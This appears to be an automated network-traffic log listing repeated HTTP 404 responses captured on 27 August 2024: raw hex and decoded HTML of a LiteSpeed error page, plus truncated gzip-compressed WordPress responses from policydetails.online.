Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 27 Aug 2024 15:48:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 27 Aug 2024 15:48:48 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 27 Aug 2024 15:48:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 27 Aug 2024 15:48:53 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://policydetails.online/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 27 Aug 2024 15:49:01 GMTserver: LiteSpeedData Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a 72 6d fb b1 1c 42 07 92 58 8b eb 4c 9b eb 76 45 ae 61 94 8b 9b d8 8a dc 30 e1 a8 17 18 7c 42 1e 92 ce 57 f3 ce cc 46 f9 17 17 9d 5f e8 22 bf 7e f3 ea c3 ab 4f dc 2f 9d 8b 7b d7 b7 83 7b e5 cb 7d 48 96 c1 57 f7 3d 49 12 4c 3d e6 0c 6e cd cf cc 98 7c 8c 3c 7e c2 a6 1f 4f 6e 3b b7 9d 58 b9 57 82 68 7e db 71 97 98 5b 7c db b1 82 88 dc 76 18 f3 6d 47 eb 2b aa d2 bd ed 0c f5 87 a1 7e db e1 25 1e 0a 80 5f 09 fd 39 1e e2 bb f9 69 f2 c0 c8 a4 e1 df b7 99 40 7c a3 02 83 34 b2 08 3f 59 f3 58 71 cb 4c 98 1a b9 be 4c dd b6 05 bb ed dc 87 b2 eb 5b 5e 6a d3 09 7c c5 0f 06 18 ab 8c c5 27 98 b5 b2 74 7d e5 6b fc f2 8e 44 c6 40 19 28 1a bf d9 4c 61 bb 4b ee c3 c2 8d 39 c7 f5 08 87 7f cd 34 09 e4 39 f1 49 04 68 9b 9a f3 d2 49 7d 2b 71 03 5f 70 25 5f 5c df 99 11 17 48 b1 44 a6 c5 38 67 09 44 5c 27 d1 8a bd 4b 8c 75 9c 86 d4 67 3f 90 38 89 27 44 4a dc 25 be 99 cb 70 22 f8 e4 9e 7b 03 c1 a2 72 67 7a 29 79 e7 08 e2 66 1a 93 38 86 f8 f7 49 10 c1 fe 0a b6 c4 ef 98 b5 10 48 ff 7a ff ee 3f 4a 9c 44 58 3d d7 59 09 89 28 6e 60 10 6b 41 e1 36 9b 12 3e 14 80 41 55 23 8a 85 a9 46 7f 11 2b 11 54 49 95 f0 6c fa 70 14 25 db 25 e5 e3 82 b8 f3 45 22 e2 3d 66 ed 7d c0 7a 0a 09 c8 55 71 4a 27 97 18 54 cb 8f ae 9f 74 f5 57 51 64 ae 04 a2 cc a1 13 75 0e e8 6e 1e 23 5a b1 41 28 4a 91 01 de 93 75 f2 99 4e d2 8f d2 46 9c 46 24 49 23 9f 4b 14 02 27 58 09 85 01 a9 f9 c4 75 fe 92 18 86 11 7d 4a 3e 6f c4 ca c0 69 61 e0 f8 de a5 e6 07 b5 05 8f e2 1d cf 9c f3 93 9c d1 07 11 7f 9b da a3 ae 85 4f c7 e9 de a6 0e 51 9d db 54 57 55 1b 9f 03 73 98 8d c0 c7 77 90 cd b6 c8 c4 97 97 da e4 72 5b ac ed 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://policydetails.online/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 27 Aug 2024 15:49:05 GMTserver: LiteSpeedData Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a 72 6d fb b1 1c 42 07 92 58 8b eb 4c 9b eb 76 45 ae 61 94 8b 9b d8 8a dc 30 e1 a8 17 18 7c 42 1e 92 ce 57 f3 ce cc 46 f9 17 17 9d 5f e8 22 bf 7e f3 ea c3 ab 4f dc 2f 9d 8b 7b d7 b7 83 7b e5 cb 7d 48 96 c1 57 f7 3d 49 12 4c 3d e6 0c 6e cd cf cc 98 7c 8c 3c 7e c2 a6 1f 4f 6e 3b b7 9d 58 b9 57 82 68 7e db 71 97 98 5b 7c db b1 82 88 dc 76 18 f3 6d 47 eb 2b aa d2 bd ed 0c f5 87 a1 7e db e1 25 1e 0a 80 5f 09 fd 39 1e e2 bb f9 69 f2 c0 c8 a4 e1 df b7 99 40 7c a3 02 83 34 b2 08 3f 59 f3 58 71 cb 4c 98 1a b9 be 4c dd b6 05 bb ed dc 87 b2 eb 5b 5e 6a d3 09 7c c5 0f 06 18 ab 8c c5 27 98 b5 b2 74 7d e5 6b fc f2 8e 44 c6 40 19 28 1a bf d9 4c 61 bb 4b ee c3 c2 8d 39 c7 f5 08 87 7f cd 34 09 e4 39 f1 49 04 68 9b 9a f3 d2 49 7d 2b 71 03 5f 70 25 5f 5c df 99 11 17 48 b1 44 a6 c5 38 67 09 44 5c 27 d1 8a bd 4b 8c 75 9c 86 d4 67 3f 90 38 89 27 44 4a dc 25 be 99 cb 70 22 f8 e4 9e 7b 03 c1 a2 72 67 7a 29 79 e7 08 e2 66 1a 93 38 86 f8 f7 49 10 c1 fe 0a b6 c4 ef 98 b5 10 48 ff 7a ff ee 3f 4a 9c 44 58 3d d7 59 09 89 28 6e 60 10 6b 41 e1 36 9b 12 3e 14 80 41 55 23 8a 85 a9 46 7f 11 2b 11 54 49 95 f0 6c fa 70 14 25 db 25 e5 e3 82 b8 f3 45 22 e2 3d 66 ed 7d c0 7a 0a 09 c8 55 71 4a 27 97 18 54 cb 8f ae 9f 74 f5 57 51 64 ae 04 a2 cc a1 13 75 0e e8 6e 1e 23 5a b1 41 28 4a 91 01 de 93 75 f2 99 4e d2 8f d2 46 9c 46 24 49 23 9f 4b 14 02 27 58 09 85 01 a9 f9 c4 75 fe 92 18 86 11 7d 4a 3e 6f c4 ca c0 69 61 e0 f8 de a5 e6 07 b5 05 8f e2 1d cf 9c f3 93 9c d1 07 11 7f 9b da a3 ae 85 4f c7 e9 de a6 0e 51 9d db 54 57 55 1b 9f 03 73 98 8d c0 c7 77 90 cd b6 c8 c4 97 97 da e4 72 5b ac ed 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://policydetails.online/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 27 Aug 2024 15:49:07 GMTserver: LiteSpeedData Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a 72 6d fb b1 1c 42 07 92 58 8b eb 4c 9b eb 76 45 ae 61 94 8b 9b d8 8a dc 30 e1 a8 17 18 7c 42 1e 92 ce 57 f3 ce cc 46 f9 17 17 9d 5f e8 22 bf 7e f3 ea c3 ab 4f dc 2f 9d 8b 7b d7 b7 83 7b e5 cb 7d 48 96 c1 57 f7 3d 49 12 4c 3d e6 0c 6e cd cf cc 98 7c 8c 3c 7e c2 a6 1f 4f 6e 3b b7 9d 58 b9 57 82 68 7e db 71 97 98 5b 7c db b1 82 88 dc 76 18 f3 6d 47 eb 2b aa d2 bd ed 0c f5 87 a1 7e db e1 25 1e 0a 80 5f 09 fd 39 1e e2 bb f9 69 f2 c0 c8 a4 e1 df b7 99 40 7c a3 02 83 34 b2 08 3f 59 f3 58 71 cb 4c 98 1a b9 be 4c dd b6 05 bb ed dc 87 b2 eb 5b 5e 6a d3 09 7c c5 0f 06 18 ab 8c c5 27 98 b5 b2 74 7d e5 6b fc f2 8e 44 c6 40 19 28 1a bf d9 4c 61 bb 4b ee c3 c2 8d 39 c7 f5 08 87 7f cd 34 09 e4 39 f1 49 04 68 9b 9a f3 d2 49 7d 2b 71 03 5f 70 25 5f 5c df 99 11 17 48 b1 44 a6 c5 38 67 09 44 5c 27 d1 8a bd 4b 8c 75 9c 86 d4 67 3f 90 38 89 27 44 4a dc 25 be 99 cb 70 22 f8 e4 9e 7b 03 c1 a2 72 67 7a 29 79 e7 08 